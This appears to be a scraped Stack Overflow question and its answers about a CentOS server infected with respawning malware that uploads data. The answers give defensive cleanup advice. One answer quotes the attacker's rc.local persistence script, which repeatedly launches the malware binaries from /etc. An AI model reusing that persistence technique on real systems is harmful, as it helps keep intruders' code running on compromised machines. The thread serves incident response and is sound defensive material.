Question
Im using centos 6.5, recently i realised that my computer is uploading something(i didn't even ask for), at upload speed 11mbps, but the scary part is my internet upload speed is 800Kbps, Every day it shows 200GB uploaded and so on.. You can see some unknown processes starting in the image 1 attached.. gfhddsfew, sdmfdsfhjfe, gfhjrtfyhuf, dsfrefr, ferwfrre, rewgtf3er4t , sfewfesfs, sdmfdsfhjfe,
I tried to kill all the processes manually with kill command and deleted the files from /etc/ folder, but still, if i connect to internet these files get placed in /etc/ automatically, I don't see this issue in windows(my pc is dual boot).
Note: I used chattr -i to change permissions and deleted the file sfewfesfs, when i tried to delete the file without using chattr, its says permissions cant be changed/file cant be deleted . and one more thing, when i used command #rm /etc/sfewfesfs without chattr , the computer restarted, it happened all the time i tried to delete the file without chattr. and these executables show up in running processes only when internt is connected.
Note: Im using beam cable internet(beamtele.com ,Hyderabad, india)
Here are the images that shows the issue
Solution
Yes, you're hacked!
Congratulations!
It look's like you have rootkit, or vulnerability. Try to update your system and use utilities like rkhunter and clamav.
Than you need to check system files
rpm -q --verify
Or you can fully reinstall your system instead.
OTHER TIPS
It won't be helpful even if you deleted these files: /tmp/.sshdd1401029612 or /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs
You may first delete a few (binary) files introduced to your system by the intruder:
(A) /etc/rcX.d/S99local
X = 2,3,4,5
This script will call up /etc/rc.d/rc.local to launch several attacks on your system.
(B) So, it is better to immediately delete this file as well. You see the content of this file will launch several binaries to attack your system:
https://stackoverflow.com/questions/23292718
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russian#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
It is strongly recommended to delete this file /etc/rc.d/rc.local by force.
(C) After deleting those files above, you can start to sudo to terminate processes:
(i) /etc/ssh/sshpa
which causes the creation of /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs
(ii) and to terminate processes : /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs
(D) Please delete these files immediately : /etc/ssh/sshpa, /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs
and use htop to make sure they are not launched in the background anymore.
(E) Updating your system, please don't forget to change root's password, and all users' passwords.
Unfortunately, chkrootkit and rkhunter may not be able to detect this intruder. Perhaps, I don't know how to fully utilize these two rootkit checkers. Or perhaps both rootkit checkers should be updated. Or perhaps there is other reason...
I found out that there is an executable file .SSH2 in the /etc/ folder. Delete it. It probably cause the creation of another executable file .sshdd1401029612 in the /tmp/ directory that cause all the troubles. I checked it using htop. The file is big. The other files gfhddsfew, sdmfdsfhjfe, gfhjrtfyhuf, dsfrefr, ferwfrre were just probably dummy files.
Thanks for sharing your problem. If your would have not shared it, it would be very difficult to get into quick conclusion.
Im also using cable net at Mumbai. Its a virus attack. Linux??virus??? ya this was my reaction too.
Finally I found that it was coz of root access to the machine through ssh coz of weak password (password "root").
To disable ssh root login, edit /etc/ssh/sshd_config and add/modify the following line:
PermitRootLogin no
References: https://forum.manjaro.org/index.php?topic=13806.0
Also have a look at: https://isc.sans.edu/forums/diary/Unfriendly+crontab+additions/17282/ Your crontab may be similar; in any case get rid of those nasty entries before you delete the aforementioned files. Clamav found two exploits on my server, and my crontab listed www.frade8c.com which was tracked to Beijing. After doing all of the above, including disabling remote root login, make sure to close/change Port 22 (if using ssh) and randomize your root password, 15 chars minimum.
This link was in a post from the review queue which aparantly was a test I failed - whoops. However I thought it was interesting to see the sort of things that a naughty script could do - http://pastebin.com/9iqWhWde
Adding lots to rc.local, clearing logs, killing processes (iptables and I presume other bots), adding stuff to cron of course. If someone else is infected with this or similar it would give them a few good places to check for damage.
I had the same issue on a server. you need to find a way to make the space available on the disk to 0% or folder not writable. Then, delete all the files and you should be free to go.
